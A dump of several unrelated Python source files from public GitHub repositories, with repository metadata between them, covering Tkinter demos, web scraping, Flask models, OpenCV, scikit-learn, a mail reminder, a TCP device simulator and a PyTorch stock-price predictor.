# bd=4,command=added_value.log10).grid(row=4, column= 4, pady = 1)
# btncos = Button(calc, text="log1p",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.log1p).grid(row=4, column= 5, pady = 1)
# btnexpm1 = Button(calc, text="expm1",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.expm1).grid(row=4, column= 6, pady = 1)
# btngamma = Button(calc, text="gamma",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.lgamma).grid(row=4, column= 7, pady = 1)
# #**************************************************************#
# btnlog2 = Button(calc, text="log2",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.log2).grid(row=5, column= 4, pady = 1)
# btndeg = Button(calc, text="deg",width=6, height=2,bg="red", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.degrees).grid(row=5, column= 5, pady = 1)
# btnacosh = Button(calc, text="acosh",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.acosh).grid(row=5, column= 6, pady = 1)
# btnasinh = Button(calc, text="asinh",width=6, height=2,bg="blue", font=('Helvetica',20,'bold'),
# bd=4,command=added_value.asinh).grid(row=5, column= 7, pady = 1)
# lblDisplay = Label(calc, text = "Scientific Calculator",font=('Helvetica',30,'bold'),
# fg='green',justify=CENTER)
# lblDisplay.grid(row=0, column= 4,columnspan=4)
# #**************************************************************#
# def iExit():
# iExit = tkinter.messagebox.askyesno("Scientific Calculator","Do you want to exit ?")
# if iExit>0:
# root.destroy()
# return
# def Scientific():
# root.resizable(width=False, height=False)
# root.geometry("944x568+0+0")
# def Standard():
# root.resizable(width=False, height=False)
# root.geometry("480x568+0+0")
# menubar = Menu(calc)
# filemenu = Menu(menubar, tearoff = 0)
# menubar.add_cascade(label = 'File', menu = filemenu)
# filemenu.add_command(label = "Standard", command = Standard)
# filemenu.add_command(label = "Scientific", command = Scientific)
# filemenu.add_separator()
# filemenu.add_command(label = "Exit", command = iExit)
# editmenu = Menu(menubar, tearoff = 0)
# menubar.add_cascade(label = 'Edit', menu = editmenu)
# editmenu.add_command(label = "Cut")
# editmenu.add_command(label = "Copy")
# editmenu.add_separator()
# editmenu.add_command(label = "Paste")
# root.config(menu=menubar)
# root.mainloop()
# import re
# p= re.compile("(-?\d+[.+\-*\/^%])*(\d+)")
# l= p.match("-9/0/9090.90*98089+09888-65878")
# print(l)
# print(l.())
import tkinter as tk # python 3.x
# import Tkinter as tk # python 2.x
class Example(tk.Frame):
    """Demo frame: an Entry with per-keystroke validation plus a Text
    widget that dumps every percent-substitution Tk passes to the
    validate callback.

    Percent substitutions (from the Tk entry man page):
      %d action (1=insert, 0=delete, -1 other)   %i index of the edit
      %P proposed value    %s value before edit  %S text inserted/deleted
      %v validate setting  %V what triggered the callback  %W widget name
    """

    def __init__(self, parent):
        tk.Frame.__init__(self, parent)
        # Register the callback and request every substitution so the
        # demo can display them all.
        vcmd = (self.register(self.onValidate),
                '%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W')
        self.entry = tk.Entry(self, validate="key", validatecommand=vcmd)
        self.text = tk.Text(self, height=10, width=40)
        self.entry.pack(side="top", fill="x")
        self.text.pack(side="bottom", fill="both", expand=True)

    def onValidate(self, d, i, P, s, S, v, V, W):
        """Log all callback arguments, then allow only lowercase input."""
        self.text.delete("1.0", "end")
        self.text.insert("end", "OnValidate:\n")
        for label, value in (("d", d), ("i", i), ("P", P), ("s", s),
                             ("S", S), ("v", v), ("V", V), ("W", W)):
            self.text.insert("end", "%s='%s'\n" % (label, value))

        # Disallow anything but lowercase letters
        if S == S.lower():
            return True
        self.bell()
        return False
if __name__ == "__main__":
    # Manual demo entry point: build the UI and run the Tk event loop.
    root = tk.Tk()
    Example(root).pack(fill="both", expand=True)
    root.mainloop()
"51360466+akaProgramer@users.noreply.github.com"
] | 51360466+akaProgramer@users.noreply.github.com |
ccbd6d4fef4e78de38c9276cc38f6fa7330b80d5 | e23a4f57ce5474d468258e5e63b9e23fb6011188 | /125_algorithms/_examples/_algorithms_challenges/pybites/intermediate/097_beautifulsoup_ii_scrape_us_holidays/save1_passed.py | 23b546430bed3f5a69c3ef251e95a5ae2acb06fc | [] | no_license | syurskyi/Python_Topics | 52851ecce000cb751a3b986408efe32f0b4c0835 | be331826b490b73f0a176e6abed86ef68ff2dd2b | refs/heads/master | 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 | Python | UTF-8 | Python | false | false | 1,037 | py | from collections import defaultdict
import os
from urllib.request import urlretrieve

from bs4 import BeautifulSoup
# prep data: download the scraped holidays page once and cache it in TMP.
# (The original line here was corrupted to "u..(" -- restored to the
# urllib.request.urlretrieve call it clearly was.)
tmp = os.getenv("TMP", "/tmp")
page = 'us_holidays.html'
holidays_page = os.path.join(tmp, page)
urlretrieve(
    f'https://bites-data.s3.us-east-2.amazonaws.com/{page}',
    holidays_page
)
with open(holidays_page) as f:
    content = f.read()

# Module-level accumulator kept for backwards compatibility with any
# code that imports it directly.
holidays = defaultdict(list)
def get_us_bank_holidays(content=content):
    """Receive scraped html output, make a BS object, parse the bank
    holiday table (css class = list-table), and return a dict of
    keys -> months and values -> list of bank holidays"""
    soup = BeautifulSoup(content, 'html.parser')
    holiday_table = soup.find('table', {'class': 'list-table'})
    # Two-digit month taken from the ISO date inside each <time> tag
    # (characters 5-7 of e.g. '2020-01-01').
    months = [row.text[5:7] for row in holiday_table.findAll('time')]
    names = [row.text.strip() for row in holiday_table.findAll('a')]
    # Reset the module-level accumulator so repeated calls do not
    # duplicate entries (the original kept appending on every call).
    holidays.clear()
    for month, name in zip(months, names):
        holidays[month].append(name)
    return holidays
"sergejyurskyj@yahoo.com"
] | sergejyurskyj@yahoo.com |
132621d5f6ab373ae23b1baefd99716e1277af0d | 9be8a12c1fe2dc4758f490a5bf7ca45d4d1c42ab | /KCCScripts/runFileSamplerForBackups.py | ece95704d0ed69ebd26f0154456250bf421709ec | [] | no_license | nathanwisla/PythonScriptCollection | 06e1952f2de2334fb7fe86c2897c70ed8e1c1994 | 569215b5f4360b9cfa11628c66bef21a35963908 | refs/heads/master | 2023-04-17T10:19:02.387485 | 2021-04-22T19:24:58 | 2021-04-22T19:24:58 | 180,291,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 338 | py | from playground import FileSampler
import datetime
# Sample .trp backup files for the given capture date and dump them
# into the destination folder.
srcRoot = 'D:\\Backup\\23610009_CUS_Rogers_Network_Optimization_Program\\CA_Campaign_02\\System2\\Raw_Data'
dstRoot = 'D:\\BUDump'
date = datetime.date(2019, 8, 23)
print('Collecting .trp files...')
sampler = FileSampler(srcRoot, dstRoot, date, backup=True)
print('.trp files found!')
sampler.dump()
| [
"noreply@github.com"
] | nathanwisla.noreply@github.com |
b66cd2a75f8274f5c9bc8c2a4438c8fd301d226e | bd727166524fcacd93f6cdc739e9437ebd418b56 | /05_capstone/heroku_sample/models.py | ca800c5e3d6b972207d6e9696092ce5940e22b66 | [] | no_license | jmval111/full-stack-web-projects | 317af54da8bbdb0695ae007644c7dbb32ad52882 | a411741eaf04944b5d7411bc1e696ad580bd1a98 | refs/heads/master | 2023-04-20T23:33:01.025798 | 2020-09-30T12:52:25 | 2020-09-30T12:52:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 900 | py | import os
from sqlalchemy import Column, String, create_engine, Integer
from flask_sqlalchemy import SQLAlchemy
import json
database_path = os.environ['DATABASE_URL']
db = SQLAlchemy()
'''
setup_db(app)
binds a flask application and a SQLAlchemy service
'''
def setup_db(app, database_path=database_path):
    """Bind a Flask application to the SQLAlchemy service and create
    all tables for the declared models."""
    app.config.update(
        SQLALCHEMY_DATABASE_URI=database_path,
        SQLALCHEMY_TRACK_MODIFICATIONS=False,
    )
    db.app = app
    db.init_app(app)
    db.create_all()
'''
Person
Have title and release year
'''
class Person(db.Model):
    """SQLAlchemy model for a person with a name and a catchphrase."""
    __tablename__ = 'People'
    # Auto-incrementing surrogate primary key.
    id = Column(Integer, primary_key=True)
    name = Column(String)
    catchphrase = Column(String)
    def __init__(self, name, catchphrase=""):
        self.name = name
        self.catchphrase = catchphrase
    def format(self):
        """Return a JSON-serializable dict representation of the row."""
        return {
            'id': self.id,
            'name': self.name,
            'catchphrase': self.catchphrase}
"akueisara39@gmail.com"
] | akueisara39@gmail.com |
e4387b17b1c180a54707d3c99af0986563228ab2 | bdbbd34b0fb75669ac60ce1774e2484f6ef3b07c | /ch1/Mouse.py | ec83a965d465bf0905a67b82493b204d43f35d46 | [] | no_license | yuling111/opencv | 66e96f1c753dd43111bcd9cc09c93ae220bf13e8 | a017434aba3b64e4663a11bfeefa3f33e5958632 | refs/heads/master | 2023-06-25T12:56:49.435972 | 2021-07-30T09:47:19 | 2021-07-30T09:47:19 | 389,839,258 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 653 | py | import numpy as np
import cv2 as cv
# 鼠标回调函数
def draw_circle(event,x,y,flags,param):
    """Mouse callback: draw on the module-level ``img`` canvas."""
    # Left double-click: filled blue circle (BGR 255,0,0) of radius 10.
    if event == cv.EVENT_LBUTTONDBLCLK:
        cv.circle(img,(x,y),10,(255,0,0),-1)
    # Right-button press: red rectangle outline, 50 px wide, 5 px tall.
    elif event == cv.EVENT_RBUTTONDOWN:
        cv.rectangle(img, (x,y), (x+50,y+5), (0,0,255),3)
# Create a black image and a window, then bind the mouse callback to it.
img = np.zeros((512,512,3), np.uint8)
cv.namedWindow('image')
# Hook mouse events: cv.setMouseCallback(window, handler_function).
cv.setMouseCallback('image',draw_circle)
# Redraw until ESC (keycode 27) is pressed.
while(1):
    cv.imshow('image',img)
    if cv.waitKey(20) & 0xFF == 27:
        break
cv.destroyAllWindows()
"waini1023@gmail.com"
] | waini1023@gmail.com |
bb02dddbd6ef8c599eda31ca5a6d7365c3f4b787 | 636ba2700eaf3a151b73144b510f38c75ab1919d | /ml/m11_kfold_estimators2_cancer.py | 83c224be41b0db487d18733b67d449cc86ebf928 | [] | no_license | Taerimmm/ML | 17997f388e18c28dfd9de83af98a6d4bebe7e1f0 | 6147cede81ebcc95f21adebf75731fbbb11edfab | refs/heads/master | 2023-06-10T14:26:45.335219 | 2021-07-05T15:30:47 | 2021-07-05T15:30:47 | 324,874,959 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,070 | py | from sklearn.model_selection import train_test_split, KFold, cross_val_score
from sklearn.metrics import accuracy_score
from sklearn.utils import all_estimators
from sklearn.datasets import load_breast_cancer
import warnings
warnings.filterwarnings('ignore')
# Breast-cancer binary classification dataset.
dataset = load_breast_cancer()
x = dataset.data
y = dataset.target
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=44)
# 5-fold cross-validation with shuffled splits.
kfold = KFold(n_splits=5, shuffle=True)
import sklearn
print(sklearn.__version__) # 0.23.2
# all_estimators is tuned for sklearn 0.20.
allAlgorithms = all_estimators(type_filter='classifier') # every sklearn classifier model
# print(allAlgorithms)
# Try every classifier: report cross-validated scores, and fall through
# for estimators that cannot be constructed/fit under this version.
for (name, algorithm) in allAlgorithms:
    try :
        model = algorithm()
        scores = cross_val_score(model, x_train, y_train, cv=kfold) # cv=5 also works (then shuffle=False)
        print(name, '의 정답율 :\n', scores)
    except :
        # continue
        print(name, '은 없는 놈') # algorithm not available in 0.23.2
# These per-model scores can serve as a baseline metric.
| [
"xofla7560@naver.com"
] | xofla7560@naver.com |
11b20acbca4a4bd934ba49818f71c81446229c4e | 888c8c1e251b99b582ab9080ea10924c30a7b7a1 | /modules/reminder.py | 43e2ee4ceb4ef161ad657c73ffe9b2edfaa553fe | [] | no_license | lijianzwm/step-everyday | e4385a538c32bbfef6b93f631fb70777bdbe89f5 | 719fad41a330882d65a52947271cf36f71e7d3fc | refs/heads/master | 2021-01-01T17:48:53.569473 | 2017-09-12T05:25:05 | 2017-09-12T05:25:05 | 98,161,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,373 | py | # -*- coding:utf-8 -*-
"""定时提醒模块"""
import datetime
from modules.db import DB
from modules.mail import MailBox
from config import Config
from modules.mail import MailSender
class Reminder:
    """Scheduled-review reminder: builds per-user review notes from past
    entries and mails them out; also fetches new mail into the store."""

    # Spaced-repetition intervals, in days.
    interval = [1, 2, 7, 14, 30, 90]

    def __init__(self):
        pass

    def _review_date(self):
        """Return the review dates ('YYYY-MM-DD'), one per interval."""
        today = datetime.date.today()
        return [(today - datetime.timedelta(days=days)).strftime('%Y-%m-%d')
                for days in self.interval]

    def _generate_review_note(self):
        """Build one merged review note per recipient.

        Returns a dict mapping email address -> note text.
        """
        dates = self._review_date()
        notes = {}
        for address in Config.RECEIVE_LIST:
            with DB() as db:
                contents = db.select_content(dt_list=dates, email=address)
                notes[address] = "\n\n\n".join(contents)
        return notes

    def remind(self):
        """Mail each recipient their review note for today."""
        notes = self._generate_review_note()
        title = datetime.date.today().strftime('%Y-%m-%d')+"复习内容"
        with MailSender() as sender:
            for address, note in notes.items():
                sender.send(address, title, note)

    def fetch(self):
        """Pull new mail, persist it, then delete it from the mailbox."""
        with MailBox() as mailbox:
            messages = mailbox.receive()
            mailbox.save(messages)
            mailbox.delete()
| [
"lijian8931@163.com"
] | lijian8931@163.com |
43b64d2dd71ecb0c76c663205e0bfac8317835b3 | 315af6a46b15e6eff887ae37aff9737286dfc1d8 | /celuchop2/urls.py | 07ce8135356e2dd5919b4260caeaf5b93a90a397 | [] | no_license | andresx213/clase | b5c8c9b1f2fc4d9fdda180dcfd825f639085d676 | 1d27456e3ef236e2764f363cd3cacd783a69ca7e | refs/heads/master | 2022-11-29T19:38:25.918295 | 2020-08-10T19:52:18 | 2020-08-10T19:52:18 | 286,567,207 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | """celuchop2 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
# URL routing table: Django admin plus the two project apps.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('tienda/',include('apps.tienda.urls')),
    path('apellido/',include('apps.maintenance.urls'))
]
| [
"andresortega2015@gmail.com"
] | andresortega2015@gmail.com |
b73865ffa809ff7d0b2a4617221883370eeb59a5 | ca23ecd39c84a42879dbb35f2dbae09cb62db750 | /simulators/switch_matrix/__init__.py | 5d8ddd9aebedc7fc4f0c7bfc9fdcabb65b18fbed | [] | no_license | discos/simulators | 41753cd38f732914a7727fa8663b3c467c68bbbe | 5d5db291939b75ec07253c203b103fd9f515fbd2 | refs/heads/master | 2023-07-21T06:40:08.071685 | 2023-07-10T13:32:09 | 2023-07-10T13:32:09 | 96,300,452 | 5 | 0 | null | 2023-09-08T13:36:07 | 2017-07-05T09:11:41 | Python | UTF-8 | Python | false | false | 2,339 | py | # Author:
# Lorenzo Monti <lorenzo.monti@inaf.it>
import re
from socketserver import ThreadingTCPServer
from simulators.common import ListeningSystem
servers = [
(('0.0.0.0', 13200), (), ThreadingTCPServer, {}),
]
class System(ListeningSystem):
    """Simulator for the IF switch-matrix protocol: accumulates received
    characters until newline, then parses ';'-separated get/set commands."""
    # Protocol command -> handler method name.
    commands = {
        'set IF_switch_config': 'set_IF_switch_config',
        'get IF_switch_config': 'get_IF_switch_config',
    }
    # Line terminator appended to every reply.
    tail = '\r\n'
    ack = 'ACK'
    nack = 'NACK'
    def __init__(self):
        self._set_default()
        self.sw_matrix = SwitchMatrix()
    def _set_default(self):
        # Clear the receive buffer.
        self.msg = ''
    def parse(self, byte):
        """Feed one received character.

        Returns the reply once a full newline-terminated message has
        been accumulated, True otherwise.
        """
        if byte == '\n':  # Ending char
            msg = self.msg
            self._set_default()
            return self._parse(msg)
        else:
            self.msg += byte
            return True
    def _parse(self, msg):
        """Dispatch each ';'-separated command to its handler.

        A set command replies immediately; get replies are joined with
        ';'. Returns True when the message produced no textual answer.
        """
        commandList = msg.replace("\r", "").split(';')
        answer = ''
        for command in commandList:
            # Split on non-word characters into tokens: verb, keyword,
            # and (for set commands) the value.
            args = re.split(r'\W+', command)
            if len(args) < 2:
                continue
            cmd_name = self.commands.get(args[0] + " " + args[1])
            if len(args) > 2:  # set methods
                # NOTE(review): a set command returns right away,
                # dropping any commands that follow it in the message.
                answer = getattr(self, cmd_name)(args[2])
                return answer
            method = getattr(self, cmd_name)  # get methods
            ans = method()
            if isinstance(ans, str):
                answer += ans + ';'
        if answer:
            # Drop the trailing ';' separator.
            answer = answer[:-1]
            return answer
        else:
            return True
    def set_IF_switch_config(self, params):
        """Select switch configuration number ``params`` (int); reply ACK."""
        self.sw_matrix.switch_matrix = int(params)
        return self.ack + self.tail
    def get_IF_switch_config(self):
        """Reply '<index>:<label>' plus the protocol line terminator."""
        return self.sw_matrix.switch_matrix + self.tail
class SwitchMatrix:
    """Model of the IF switch matrix: the active configuration index plus
    a lookup table describing each configuration."""

    def __init__(self):
        # Active configuration index; defaults to 1.
        self._switch_matrix = 1
        # index -> configuration row; the last entry is the short label
        # reported by the `switch_matrix` property.
        self._matrix = {
            1: [False, True, False, "H LSB", "H USB", "HBS"],
            2: [False, False, True, "V LSB", "V USB", "VBS"],
            3: [True, True, False, "H LSB", "V LSB", "LBP"],
            4: [True, False, True, "H USB", "V USB", "UBP"],
        }

    @property
    def switch_matrix(self):
        """Return '<index>:<label>' for the current configuration."""
        label = self._matrix[self._switch_matrix][-1]
        return '%s:%s' % (self._switch_matrix, label)

    @switch_matrix.setter
    def switch_matrix(self, value):
        self._switch_matrix = value
| [
"noreply@github.com"
] | discos.noreply@github.com |
54e9459c1b681d912fbe6e5ccad6d73b8cc6d3e8 | 0ff483891f3b0008b0384f95d1045e635934fa37 | /pre_kakao.py | 9400f3159bee5dff96263208ca4616277dcb7767 | [] | no_license | wjb127/predict_stock_price | 0646475c090f4ca931d45a62da95f80d1120704e | d44f157cb46d2366911c71bea54d697fe9cd0be8 | refs/heads/master | 2023-06-12T00:12:28.265197 | 2021-07-06T02:12:48 | 2021-07-06T02:12:48 | 383,311,540 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,410 | py | import torch
from torchvision import transforms, datasets
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import style
import pandas as pd
import os
# Let duplicate OpenMP runtimes coexist (common torch+matplotlib workaround).
os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"
# Random seed value, for reproducible weight initialisation.
torch.manual_seed(77)
# Activation functions (element-wise, on torch tensors).
def sigmoid(x):
    """Logistic function: 1 / (1 + exp(-x))."""
    one = torch.tensor(1.0)
    return one / (one + torch.exp(-x))
def sigmoid_prime(x):
    """Derivative of the logistic function: s(x) * (1 - s(x))."""
    s = sigmoid(x)
    return s * (torch.tensor(1.0) - s)
def sigmoid_inverse(x):
    """Logit (inverse logistic): -log(1/x - 1), defined for 0 < x < 1."""
    one = torch.tensor(1.0)
    return -torch.log(one / x - one)
# File that once stored gradients (disabled).
#FILE_NAME = 'gradient.txt'
#f = open(FILE_NAME, 'w')
# Training data; only the first row of the sheet is used.
df = pd.read_excel('train/train_kakao.xlsx')
data2 = np.array(df)
#print(len(data2[0]))
# Network input/output sizes.
# Take the series length as-is.
datalen = len(data2[0])
# One-hot output width: 351 classes (price change mapped via +175 offset).
outputlen = 351
# Build inputs (sliding 9-day windows) and labels (the following day).
X = []
Y = []
for i in range(0,datalen - 9):
    X.append(data2[0][i:i+9])
    Y.append(data2[0][i+9])
X = [np.array(X)]
dtype = torch.float32
# Layer sizes: 9 inputs -> 400 hidden -> `outputlen` output classes.
D_in, H, D_out = 9, 400, outputlen
# Try to resume from previously saved weights; fall back to a fresh
# random initialisation if the files are missing or have wrong shapes.
try:
    w1re = pd.read_excel('wbdata/w1_kakao.xlsx', index_col=None)
    w1np = np.array(w1re)
    w1ts = torch.Tensor(w1np)
    w2re = pd.read_excel('wbdata/w2_kakao.xlsx', index_col=None)
    w2np = np.array(w2re)
    w2ts = torch.Tensor(w2np)
    b1re = pd.read_excel('wbdata/b1_kakao.xlsx', index_col=None)
    b1np = np.array(b1re)
    b1ts = torch.Tensor(b1np)
    b2re = pd.read_excel('wbdata/b2_kakao.xlsx', index_col=None)
    b2np = np.array(b2re)
    b2ts = torch.Tensor(b2np)
    # A weight and a bias for input nodes
    w1 = w1ts
    b1 = b1ts
    # A weight and a bias for hidden nodes
    w2 = w2ts
    b2 = b2ts
    # Reject saved weights whose shapes do not match the current layout.
    # (Compare against plain tuples instead of allocating throwaway
    # torch.randn tensors just to read their .shape.)
    if (w1.shape != (D_in, H) or b1.shape != (1, H)
            or w2.shape != (H, D_out) or b2.shape != (1, D_out)):
        raise ValueError("saved weight shapes do not match network layout")
except Exception:
    # Narrowed from a bare `except:` so Ctrl-C is not swallowed.
    # A weight and a bias for input nodes, Xavier-style scaled.
    w1 = Variable(torch.randn(D_in, H, dtype=dtype, requires_grad=True)) * np.sqrt(1. / D_in)
    b1 = Variable(torch.randn(1, H, dtype=dtype, requires_grad=True)) * np.sqrt(1. / D_in)
    # A weight and a bias for hidden nodes
    w2 = Variable(torch.randn(H, D_out, dtype=dtype, requires_grad=True)) * np.sqrt(1. / H)
    b2 = Variable(torch.randn(1, D_out, dtype=dtype, requires_grad=True)) * np.sqrt(1. / H)
full_epoch = 100
learning_rate = 0.1
# Plain SGD training: manual forward/backward passes with sigmoid
# activations at both layers and a one-hot target per sample.
for epoch in range(full_epoch):
    corrects = 0
    for i in range(0,datalen - 9):
        x = torch.Tensor([X[0][i]])
        y = np.array([Y[i]])
        # Shift the label so it indexes the one-hot vector
        # (price change -> class index via +(outputlen-1)//2).
        new_y = y + (outputlen-1)//2
        y_onehot = torch.zeros((1, outputlen))
        # TODO: handle the case where new_y falls outside the one-hot range.
        y_onehot[0, new_y] += 1
        # Forward pass: input -> hidden -> output.
        z1 = torch.add(torch.mm(x, w1), b1)
        a1 = sigmoid(z1)
        z2 = torch.add(torch.mm(a1, w2), b2)
        a2 = sigmoid(z2)
        diff = a2 - y_onehot
        # backward pass
        d_z2 = torch.mul((a2 - y_onehot), sigmoid_prime(z2))
        d_b2 = torch.mul((a2 - y_onehot), sigmoid_prime(z2))
        #print(diff.shape,sigmoid_prime(z2).shape)
        d_w2 = torch.mm(torch.transpose(a1, 0, 1), torch.mul((a2 - y_onehot), sigmoid_prime(z2)))
        d_a1 = torch.mm(torch.mul((a2 - y_onehot), sigmoid_prime(z2)), torch.transpose(w2, 0, 1))
        d_z1 = torch.mul(torch.mm(torch.mul((a2 - y_onehot), sigmoid_prime(z2)), torch.transpose(w2, 0, 1)),
                         sigmoid_prime(z1))
        d_b1 = torch.mul(torch.mm(torch.mul((a2 - y_onehot), sigmoid_prime(z2)), torch.transpose(w2, 0, 1)),
                         sigmoid_prime(z1))
        d_w1 = torch.mm(torch.transpose(x, 0, 1),
                        torch.mul(torch.mm(torch.mul((a2 - y_onehot), sigmoid_prime(z2)), torch.transpose(w2, 0, 1)),
                                  sigmoid_prime(z1)))
        # weight update
        w1 -= learning_rate * d_w1
        w2 -= learning_rate * d_w2
        b1 -= learning_rate * d_b1
        b2 -= learning_rate * d_b2
        # Count a hit when the arg-max output class equals the true class.
        amaxa2 = torch.argmax(a2).numpy()
        yt = torch.Tensor(new_y)
        ytt = int(yt.numpy()[0])
        if amaxa2 == ytt:
            corrects += 1
        #if i % 10000 == 0:
        print("Epoch {}: {}/{}".format(epoch + 1, i+1, datalen - 9),end="")
        if amaxa2 != ytt:
            print(" Error!")
        else:
            print()
    print("Epoch {}, Accuracy: {:.3f}".format(epoch + 1, corrects / (datalen - 9) ))
    #if(corrects / len(data2) == 1):
        #print(w1,w2,b1,b2)
# Persist the learned weights/biases so a later run can resume from them.
raw = pd.DataFrame(np.array(w1))
raw.to_excel(excel_writer='wbdata/w1_kakao.xlsx',index=None)
raw = pd.DataFrame(np.array(w2))
raw.to_excel(excel_writer='wbdata/w2_kakao.xlsx',index=None)
raw = pd.DataFrame(np.array(b1))
raw.to_excel(excel_writer='wbdata/b1_kakao.xlsx',index=None)
raw = pd.DataFrame(np.array(b2))
raw.to_excel(excel_writer='wbdata/b2_kakao.xlsx',index=None)
# Test data: seed the rolling input window from the test sheet.
df2 = pd.read_excel('test/test_kakao.xlsx')
data3 = np.array(df2)
X2 = []
X2.append(data3[0][0:datalen-1])
X2 = [np.array(X2)]
x2 = torch.Tensor([X2[0][0]])
# Predict 5 steps ahead, feeding each prediction back into the window.
for i in range(0,5):
    # The 9 days of price data the next prediction is based on.
    print(np.array(x2[0]))
    # Forward pass through the trained network.
    z1 = torch.add(torch.mm(x2, w1), b1)
    a1 = sigmoid(z1)
    z2 = torch.add(torch.mm(a1, w2), b2)
    a2 = sigmoid(z2)
    # Verdict label: compare probability mass below vs. above the midpoint.
    if(torch.sum(a2[0][0:(outputlen)//2 - 1]) < torch.sum(a2[0][(outputlen)//2 + 1:outputlen-1])):
        print("상승")
    elif torch.sum(a2[0][0:(outputlen)//2 - 1]) > torch.sum(a2[0][(outputlen)//2 + 1:outputlen-1]):
        print("하락")
    else:
        print("횡보")
    print("상승 확률 : ", round(float(100 * torch.sum(a2[0][(outputlen) // 2 + 1:outputlen]) / torch.sum(a2)), 2))
    print("하락 확률 : ", round(float(100 * torch.sum(a2[0][0:(outputlen) // 2]) / torch.sum(a2)), 2))
    print("횡보 확률 : ", round(float(100 * torch.sum(a2[0][(outputlen) // 2 ]) / torch.sum(a2)), 2))
    # The arg-max output class is the predicted value.
    amaxa2 = torch.argmax(a2).numpy()
    # (debug) print(a2)
    # Predicted price change, shifted back from class index to delta.
    print("주가 변화 : ",amaxa2 - outputlen//2)
    print()
    # Slide the window: drop the oldest day, append the new prediction.
    x2 = list(x2[0])
    del x2[0]
    x2.append(torch.Tensor([amaxa2 - (outputlen)//2]))
    x2 = [x2]
    x2 = torch.Tensor(x2)
# x2 = [x2]
# x2 = torch.Tensor(x2)
# #print(x2)
# # 신경망 구성
# z1 = torch.add(torch.mm(x2, w1), b1)
# a1 = sigmoid(z1)
# z2 = torch.add(torch.mm(a1, w2), b2)
# a2 = sigmoid(z2)
# 결과 레이블
# if (torch.sum(a2[0][0:(outputlen) // 2 - 1]) < torch.sum(a2[0][(outputlen) // 2 + 1:outputlen - 1])):
# print("2차 상승 확률", round(float(100 * torch.sum(a2[0][(outputlen) // 2 + 1:outputlen - 1]) / torch.sum(a2)), 2))
# elif torch.sum(a2[0][0:(outputlen) // 2 - 1]) > torch.sum(a2[0][(outputlen) // 2 + 1:outputlen - 1]):
# print("2차 하락 확률", round(float(100 * torch.sum(a2[0][0:(outputlen) // 2 - 1]) / torch.sum(a2)), 2))
# else:
# print("2차 횡보")
#
# # 결과물의 최대값 보기 = 의미하는 값
# amaxa2 = torch.argmax(a2).numpy()
#
# # 계산 결과물 : print(a2)
# # 예측 결과
# print("주가 변화 : ",amaxa2 - (outputlen) // 2)
# 학습지식 정리
# 이상적인 0부터 60까지 레이블에 역함수 적용
# 시그모이드 역함수 : z1 = sigmoid_inverse(x)
# b2 빼고 w2의 역행렬 곱하기
# 시그모이드 역함수
# b1 빼고 w1 역행렬 곱하기
###############################################################################
# U2, s2, V2 = np.linalg.svd(w2, full_matrices = True)
# S2 = np.zeros(w2.shape)
# for i in range(len(s2)):
# S2[i][i] = s2[i]
# w2in = torch.Tensor(np.dot(U2, np.dot(S2, V2)))* np.sqrt(1. / U2.shape[0])
#
# U1, s1, V1= np.linalg.svd(w1, full_matrices = True)
# S1 = np.zeros(w1.shape)
# for i in range(len(s1)):
# S1[i][i] = s1[i]
# w1in = torch.Tensor(np.dot(U1, np.dot(S1, V1)))* np.sqrt(1. / U1.shape[0])
#
#
# x = torch.zeros((1,outputlen))
#
# x += 0.01
# x[0,outputlen-1] += 0.98
# #print(a2)
#
# x = a2
# #print(x)
# z1 = sigmoid_inverse(x)
# #print(z1)
# a1 = torch.mm(torch.sub(z1,b2),torch.transpose(w2in,0,1))
# #print(a1)
# z2 = sigmoid_inverse(a1)
# #print(z2)
# a2 = torch.mm(torch.sub(z2,b1),torch.transpose(w1in,0,1))
#amaxa2 = torch.argmax(a2).numpy()
#print(x)
#print(a2)
#print(amaxa2 - outputlen // 2)
###############################################################################
# Backquery: run each one-hot output class backwards through the network
# to see what input pattern it corresponds to.
bq = []
for k in range(0,outputlen):
    # Ideal output vector: 0.01 everywhere, 0.99 at class k.
    x = torch.zeros((1,outputlen))
    x += 0.01
    x[0,k] += 0.98
    #print(a2)
    #x = a2
    #print(k,end=" : ")
    # Invert the output layer: logit, then multiply by transposed w2.
    # NOTE(review): biases are not subtracted here, unlike the
    # commented-out variant later in this file.
    z1 = sigmoid_inverse(x)
    a1 = torch.mm(z1, torch.transpose(w2,0,1))
    # Rescale into (0.01, 0.99) so the next logit is defined.
    a1 -= np.min(np.array(a1))
    a1 /= np.max(np.array(a1))
    a1 *= 0.98
    a1 += 0.01
    # Invert the hidden layer the same way.
    z2 = sigmoid_inverse(a1)
    a2 = torch.mm(z2, torch.transpose(w1,0,1))
    a2 -= np.min(np.array(a2))
    a2 /= np.max(np.array(a2))
    a2 *= 0.98
    a2 += 0.01
